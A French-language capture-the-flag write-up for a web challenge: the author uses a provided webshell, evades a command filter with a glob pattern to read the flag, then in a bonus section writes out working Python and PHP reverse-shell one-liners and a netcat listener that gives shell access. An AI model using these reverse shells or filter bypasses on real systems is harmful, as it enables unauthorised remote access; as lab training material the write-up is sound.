# Web 1

`http://165.227.39.129:8080/index.php?cmd=`

On part sur un webshell, c'est un bon début. En faisant un `ls -la`, on ne voit que le fichier `test2.txt`, ce qui est louche.
Avec `pwd`, on voit que l'on est dans le dossier `/var/www/html`, qui est le répertoire contenant ce qui est servi par Apache par défaut.

En faisant `ls -la /`, on se rend compte qu'on ne voit toujours qu'un seule ligne de la sortie. On fait donc `ls -la | base64` qui, une fois décodé nous donne le contenu du répertoire.
On essaie `cat flag.txt`, mais on reçoit un message d'erreur; après quelques tests, on s'assure que c'est 'cat' et non 'flag' qui est bloqué.
Glob existe, donc cette mesure ne sert à rien: `/bin/ca? flag.txt | base64`. Si tu veux pas que j'utilise `cat`, faut enlever l'exécutable.

## Flag
UQAM{Such wow}

## Bonus - Reverse Shell

Avec le webshell, je remarque que `nc`, `ncat`, `netcat`, `socat`, etc. sont tous absents de la machine. C'est embêtant, mais pas la fin du monde.
Je set up le port forwarding sur mon routeur parce que je n'ai pas accès à une machine sur le réseau local de la cible, puis je pars le listener de mon côté:

~~~
nc -l -k -p 65004
~~~

J'essaie d'abord un reverse shell Python.

~~~
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MON_IP_A_MOI",65004));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
~~~

Surprise, pas de python sur la machine! (J'ai redirigé stderr sur stdin pour voir les messages d'erreur)

C'est certain qu'il y a PHP, donc je trouve une commande pour un reverse shell PHP sur [Pentest Monkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) et la urlencode.

~~~
php -r '$sock=fsockopen("MON_IP_A_MOI",65004);exec("/bin/sh -i <&4 >&4 2>&4");'
~~~

C'est réussi!

![Reverse Shell](./web1-reverse-shell.png "Bonus Web 1")
